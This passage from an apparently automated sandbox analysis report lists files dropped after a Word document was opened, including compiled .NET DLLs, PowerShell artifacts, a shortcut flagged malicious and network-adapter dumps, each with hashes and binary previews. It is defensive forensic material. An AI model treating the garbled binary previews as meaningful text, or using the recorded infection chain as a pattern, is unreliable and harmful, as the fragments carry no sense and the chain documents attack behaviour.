                                                                                                                                                                SHA-512:3B541FD5935FFED3F01DDCE112B22B8D2C98BC0EE717BF714A47F4BF0DAA24763E6643F85C627E4556033689C320E115829D58FA41FD1468D063AF025BD46FB7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!.................%... ...@....... ....................................@..................................$..K....@.......................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................%......H........ ..4............................................................0..6....... ....s........o....(....,..o....r...pr...po....*~....*F.r...pr...po....*..(....*BSJB............v4.0.30319......l.......#~..........#Strings............#US.........#GUID.......t...#Blob...........W=........%3............................................................................2.+...N.B.....................0.....W.......+.............................Q.9.......... \.....P ......j...... ..

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):652
                                                                                                                                                                Entropy (8bit):3.1066989304537183
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gry4AvGak7YnqqhAvXPN5Dlq5J:+RI+ycuZhNFGakSkXPNnqX
                                                                                                                                                                MD5:64D94A2D7073F66BD33CC2208133E5A1
                                                                                                                                                                SHA1:1AE59492D9835D00B608907F38431723D64A455C
                                                                                                                                                                SHA-256:B45B662776BA808968323FF4B707C4075A91C7F161B16BCBF272A15EBACE2501
                                                                                                                                                                SHA-512:DA02A91C3842FDCC1012ED32532E0A62308CCB8F9C1D8BDC41BD1937C9940EA38F06769237BB39FA64ACD5D9E5B833260B9AF9E0BCE11FE505BEA55D61AFC3E5
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.3.i.2.j.e.o.5...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...5.3.i.2.j.e.o.5...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RES753.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1364
                                                                                                                                                                Entropy (8bit):4.093394093542085
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:HXC9A+gORmHChKYofWI+ycuZhNAg3akSxggPNnq9Wd:XfORm4KB+1ulna37q9m
                                                                                                                                                                MD5:B897822D7F2477FA514831F0A0882FBF
                                                                                                                                                                SHA1:3314027293FE2F8C3615D05FBBF8F82074B20F88
                                                                                                                                                                SHA-256:ADF0AC910098B2AFADF886AE38F04627E1739213E1D98B6B1D6CADB9BDD18F51
                                                                                                                                                                SHA-512:400C9C28CCD4BC8FD270AC8A970F6A09C4AB91770A439E5BE8F7F0FB9EC4820E9B6DD93F998EAF476CE0C78FDB0BB312A51DA82D72F2AD394FBAF6C9C40735D1
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\05d3mwhu\CSC34F94DCCCDC94BCAA3A860A33C1ABBE2.TMP...............A...:._.R..BuO3...........3.......C:\Users\user\AppData\Local\Temp\RES753.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...0.5.d.3.m.w.h.u...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RESAD7B.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1364
                                                                                                                                                                Entropy (8bit):4.094913004626319
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:HA6C9AWPsShHfhhKYofII+ycuZhNAGakSxXPNnq9Wd:gIWPs2/vKBg1ulva3Dq9m
                                                                                                                                                                MD5:3FBFF0F714DC160A13352A9E252DF432
                                                                                                                                                                SHA1:FBDD29FF083E62B770F3F1EC8DBA6438A3AAA1C1
                                                                                                                                                                SHA-256:0FDD6AB3D6BD5AE7838468B731E61444EF8F68FED25D927E5E6D60929556E2DC
                                                                                                                                                                SHA-512:2BBACE52092DB94117C7EFD2EC2B57AAD26DFE7936533614BB13997DFE7AEDEE9137D0CE5A45B7E9CFD8FFFA200ACF0E0441AEC7C772E5B468AFDA9E162D456F
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP................0..\.....Jg0[d...........4.......C:\Users\user\AppData\Local\Temp\RESAD7B.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.g.h.x.i.b.c.c...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\RESC028.tmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1364
                                                                                                                                                                Entropy (8bit):4.088490273219004
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:24:HNC9AWP1CShHRWhKYofII+ycuZhNFGakSkXPNnq9Wd:ZWP1DxMKBg1ulFGa3kFq9m
                                                                                                                                                                MD5:600AC2E5970E32A5DA57BE0C93D017EF
                                                                                                                                                                SHA1:06F10F379B39E8FEFFB432C9E4CC2CC331050C63
                                                                                                                                                                SHA-256:C7763EC0DD6195FEC69739C4989AE6E7345A4D992F38C95378B7ADF1942812A3
                                                                                                                                                                SHA-512:8F3D7FD02B8F0A16A2568BBCC75E4572A68AA1B5D54FF2242DAB08EB582C352C8CE4227382CB72054A87F7E891881E495E785813C71D38800EC141B4CBA4CB11
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........S....c:\Users\user\AppData\Local\Temp\53i2jeo5\CSCF157ADCDF084F15A343B1EBC149E5EE.TMP................d.J-ps.k.<. .3...........4.......C:\Users\user\AppData\Local\Temp\RESC028.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_5429739b-e3bc-4aa7-b049-21dfa05c9515.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...5.3.i.2.j.e.o.5...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogegyc5p.v4z.ps1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogj5s2nl.gb1.psm1

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:very short file (no magic)
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1
                                                                                                                                                                Entropy (8bit):0.0
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:U:U
                                                                                                                                                                MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                                                SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                                                SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                                                SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:1

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qghxibcc\CSC6B59943BD49B40F0B0C17D73652F0B2.TMP

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:MSVC .res
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):652
                                                                                                                                                                Entropy (8bit):3.104317053724279
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryxcGak7YnqqCcXPN5Dlq5J:+RI+ycuZhNAGakSxXPNnqX
                                                                                                                                                                MD5:308FB15C011DC817C9944A67305B64F8
                                                                                                                                                                SHA1:4B90035BB888FDFD8FDA6D83EFC1755C4E37CB98
                                                                                                                                                                SHA-256:6D463DB808FFF01DB60C1B3C51540BCA82F093FD02851778D0E301F0ADEB7109
                                                                                                                                                                SHA-512:C0117DE1D59FFBDC34149FD777F1109F80C4E5717D3CDDDBC58A30ACFB4979480478523B9CE4882BE8F0C35BEF44CFAAF34430CF3A29E8E2FBF7546B99DD736A
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...q.g.h.x.i.b.c.c...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...q.g.h.x.i.b.c.c...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

                                                                                                                                                                C:\Users\user\AppData\Local\Temp\qghxibcc\qghxibcc.dll

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):5120
                                                                                                                                                                Entropy (8bit):3.782862765791784
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:65oPhmKraYZkH8KTibUyDkwjj0JCC+CFSlwYac1ulva3Dq:TDaAkHHoVk8NCu29K
                                                                                                                                                                MD5:6DE7B305B73291E9287C3717BD6A16C5
                                                                                                                                                                SHA1:6E31A7DB1B0066ABD81E6172283192563871A430
                                                                                                                                                                SHA-256:738E1980DFB7F51FD25FC21DF57521892807C7F3D106A3F7DC94EFFEE3DFD311
                                                                                                                                                                SHA-512:EBBFA0B6759477005CF190B1CE76DC53D609996A46BEDD137C3384188A4FBE8C739D5E5467918D49342DF811E4035DA88EF7BCB85CEB3DAE3F4CA19323BA2802
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......b...........!................>*... ...@....... ....................................@..................................)..S....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................ *......H....... ".............................................................."..(....*J.#(....r...p(....*..(....*2~.....(....*....0.......... ....s..... ....s...............r;..p.........(......s.............5.....".....5.....3+E...../...(.-...2.3+1...:3...+)....3...+....+...+...+...+...,...+...+......r;..p...o................ ...o.........+Y.......r=..p..o......1.r=..p..o..........+(r...p..o...........(........r...p(.........X.......i2..........(.........o........o....-.r...p....

                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\WF0SlQWKr1.docx.LNK

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:31:38 2022, mtime=Mon Jun 20 14:30:00 2022, atime=Mon Jun 20 14:29:46 2022, length=12519, window=hide
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1060
                                                                                                                                                                Entropy (8bit):4.713563953429285
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:8DKylEjUCuElPCH2PNgTBYv5e+W8Y7XfnrrcjEjAJ/+aDmQriNDOTt5n4t2Y+xI/:8DKyligTdvnrAUAJv9yDOZz7aB6m
                                                                                                                                                                MD5:FFDA0DDBE2B3DA8AD196DAC8ED90E2F8
                                                                                                                                                                SHA1:0CA4381091C5243EA82A9A0E978659E607EFE28B
                                                                                                                                                                SHA-256:AB9997C0D51E894D09D9FFDF5B92485DA98BC7F5BB0EAF19681C26DFA2072388
                                                                                                                                                                SHA-512:99998D3DF46FC1E6853AFF2DB3016CA57C737B250AC453C5B3F5E815090971A0227FC66DE067B67865943C04C2D3C4DF0BB3F6B1F79F750E070ACB8601689E4E
                                                                                                                                                                Malicious:true
                                                                                                                                                                Preview:L..................F.... .....3..3..........~......0...........................P.O. .:i.....+00.../C:\...................x.1......N....Users.d......L...T.{....................:.....q|..U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....P.1.....hT....user.<.......Ny..T.{.....S........................h.a.r.d.z.....~.1.....hT....Desktop.h.......Ny..T.{.....Y..............>.....#uk.D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....l.2..0...T.{ .WF0SLQ~1.DOC..P......hT..T.{....h.....................V$..W.F.0.S.l.Q.W.K.r.1...d.o.c.x.......U...............-.......T...........>.S......C:\Users\user\Desktop\WF0SlQWKr1.docx..&.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.W.F.0.S.l.Q.W.K.r.1...d.o.c.x.........:..,.LB.)...As...`.......X.......878411...........!a..%.H.VZAj...t............-..!a..%.H.VZAj...t............-.............1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5.5.6.3.2.0.9.-.4.0.5.3.0.6.2.3.3.2.-.1.0.0.2.........9...1

                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):82
                                                                                                                                                                Entropy (8bit):4.737525298622288
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:bDuMJlqY6e1KKpSmxW5jV7e1KKpSv:bCelK60jV0K6c
                                                                                                                                                                MD5:A99E348CE00D60BF0740FC84F6440532
                                                                                                                                                                SHA1:93DDF8193F7CDB75883B440ADF430D4725D62436
                                                                                                                                                                SHA-256:8900FF791ED7169F17EC3DAC3F09CEF9B82AAFF1D811203A9F91474D8E242CB7
                                                                                                                                                                SHA-512:F32FA8FEABB0E18717A4190B3A956B4EB9E93A7FF2094E6C8773DA04E14F876B63664DDD043F49D4279C2575E5442D9C48DA6A2B3BF8B2C93F11B3D907AB5A6D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:[folders]..Templates.LNK=0..WF0SlQWKr1.docx.LNK=0..[misc]..WF0SlQWKr1.docx.LNK=0..

                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):162
                                                                                                                                                                Entropy (8bit):2.1312669291729662
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Rl/ZdMlplt9lqKljlRll9lqKhG1jf:RtZyzlQ+ZDI68r
                                                                                                                                                                MD5:27B019B5FB5D859CF77C85CAB51A0C15
                                                                                                                                                                SHA1:117279B09579725BD9FE2315F988DA2AB2CC7E91
                                                                                                                                                                SHA-256:4316A53A8F39D94F43B91DD31311AE5358F96A3A83614A9831904726790DE130
                                                                                                                                                                SHA-512:7A960D55BB1AA9C87C266BACC640E339710A5D30173E8CC0FE9A8D844DEB2487DF23205A9C9E9C86AD790F3BE84588F3AF47BEE2EE11303DB3896F5BE52E10D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.pratesh................................................p.r.a.t.e.s.h.........<...............$.......6C......................$.......6C......................H...

                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\WWQSJKYVX7UT2XYKJSTF.temp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6205
                                                                                                                                                                Entropy (8bit):3.7658377434195667
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:InC6u6ZClp51MkvhkvCCtjXSlrHpAclrHpAR:D6u6k1IjiT3Ts
                                                                                                                                                                MD5:98D5033864AA64BAFA73B7CBAE26E3DF
                                                                                                                                                                SHA1:E14B46F11ED77F2C8771601D8051134AAE17794D
                                                                                                                                                                SHA-256:86CA636D3AA4CE708FC06F2D1C1D3E0DECD60A85BEDD5DF5795153F64692E2AE
                                                                                                                                                                SHA-512:A39EE007E153E3DA683621179E96429DF91B222349CA1472121B1791877DDE42B17A88A6E5781F0639088628C55B19187EC4ECCBC8F4221A68BB6C1A8361A477
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..t.Q..3..............t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..T.{.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..T.{.....Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..T.{.....Y........................M.i.c.r.o.s.o.f.t.....V.1.....hT....Windows.@.......Ny..T.{.....Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..T.{.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..T.{.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.hT......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):6205
                                                                                                                                                                Entropy (8bit):3.7658377434195667
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:96:InC6u6ZClp51MkvhkvCCtjXSlrHpAclrHpAR:D6u6k1IjiT3Ts
                                                                                                                                                                MD5:98D5033864AA64BAFA73B7CBAE26E3DF
                                                                                                                                                                SHA1:E14B46F11ED77F2C8771601D8051134AAE17794D
                                                                                                                                                                SHA-256:86CA636D3AA4CE708FC06F2D1C1D3E0DECD60A85BEDD5DF5795153F64692E2AE
                                                                                                                                                                SHA-512:A39EE007E153E3DA683621179E96429DF91B222349CA1472121B1791877DDE42B17A88A6E5781F0639088628C55B19187EC4ECCBC8F4221A68BB6C1A8361A477
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...................................FL..................F.".. ...N....-..;yz(.a..\.................................:..DG..Yr?.D..U..k0.&...&...........-..t.Q..3..............t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..T.{.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......Nz...Roaming.@.......Ny..T.{.....Y....................D1,.R.o.a.m.i.n.g.....\.1.....>QCw..MICROS~1..D.......Ny..T.{.....Y........................M.i.c.r.o.s.o.f.t.....V.1.....hT....Windows.@.......Ny..T.{.....Y........................W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..T.{.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..T.{.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......L...WINDOW~1..V.......Ny.hT......Y....................T_..W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......L.. .WINDOW~1.LNK..^.......Ny..P.......Y..........

                                                                                                                                                                C:\Users\user\Desktop\~$0SlQWKr1.docx

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):162
                                                                                                                                                                Entropy (8bit):2.1312669291729662
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:Rl/ZdMlplt9lqKljlRll9lqKhG1jf:RtZyzlQ+ZDI68r
                                                                                                                                                                MD5:27B019B5FB5D859CF77C85CAB51A0C15
                                                                                                                                                                SHA1:117279B09579725BD9FE2315F988DA2AB2CC7E91
                                                                                                                                                                SHA-256:4316A53A8F39D94F43B91DD31311AE5358F96A3A83614A9831904726790DE130
                                                                                                                                                                SHA-512:7A960D55BB1AA9C87C266BACC640E339710A5D30173E8CC0FE9A8D844DEB2487DF23205A9C9E9C86AD790F3BE84588F3AF47BEE2EE11303DB3896F5BE52E10D6
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.pratesh................................................p.r.a.t.e.s.h.........<...............$.......6C......................$.......6C......................H...

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\NetworkAdapter.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):740
                                                                                                                                                                Entropy (8bit):2.690074337041514
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:Q9lIaI5bUGiKcvGgRqFt1OtVdk3L69SmSQ9Y2Rfzq/O:Q9SP57Cun4ne6kmSy
                                                                                                                                                                MD5:2D7C93C04954AFD0CB251BFBD0A11854
                                                                                                                                                                SHA1:D5C16C79C018EA200482AB6A73FD39893445A07E
                                                                                                                                                                SHA-256:27AFCEECE3F01B5C116CF26FC4C29742D36EADCFA33676793354EC6BE14CFD14
                                                                                                                                                                SHA-512:CF4E70C658A67E7A4BB3ED54A10CB28B2B26D919B8447EE7A13DA98B02D2DCB3A8D10E246DD5B997E7D06CD07B9CDC9F5DA63921B963F500AE54AD6CB260E20D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:......N.a.m.e. . . . . . . . . . . . . . . . . . . . . . .I.n.t.e.r.f.a.c.e.D.e.s.c.r.i.p.t.i.o.n. . . . . . . . . . . . . . . . . . . . .i.f.I.n.d.e.x. .S.t.a.t.u.s. . . . . . . .M.a.c.A.d.d.r.e.s.s. . . . . . . . . . . . . .L.i.n.k.S.p.e.e.d.....-.-.-.-. . . . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . . . . . . . . .-.-.-.-.-.-.-. .-.-.-.-.-.-. . . . . . . .-.-.-.-.-.-.-.-.-.-. . . . . . . . . . . . . .-.-.-.-.-.-.-.-.-.....E.t.h.e.r.n.e.t.0. . . . . . . . . . . . . . . . . .I.n.t.e.l.(.R.). .8.2.5.7.4.L. .G.i.g.a.b.i.t. .N.e.t.w.o.r.k. .C.o.n.n....... . . . . . .1.1. .U.p. . . . . . . . . . . .E.C.-.F.4.-.B.B.-.8.6.-.2.D.-.E.D. . . . . . . . . .1. .G.b.p.s.............

                                                                                                                                                                C:\Windows\Temp\8f720a5db6c7\NetworkAdapterConfig.txt

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                File Type:Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):3870
                                                                                                                                                                Entropy (8bit):3.249508667315905
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:48:/225dKC97CakmbraXwQxWZsxsfw/6S8hU2S92pMWd2cy9hu:/5CjaMLu
                                                                                                                                                                MD5:63F77FFDED3DB83178F6F16E0D838D8C
                                                                                                                                                                SHA1:5837B73682E9F56B5AD262DF33D658F769E137C3
                                                                                                                                                                SHA-256:9D1627DE4F5595F0C9AF05606390780BAB4DCF1E9A26823135511680A7E7385B
                                                                                                                                                                SHA-512:F488DD5843CED7CC33C7E23B7819D9FF906B0CEC2817DE88BB36380D862D9A75D395840919B3FD3C41B815CD63A58DFCA1CC4CE56E1A83D69797291CBDF69906
                                                                                                                                                                Malicious:false
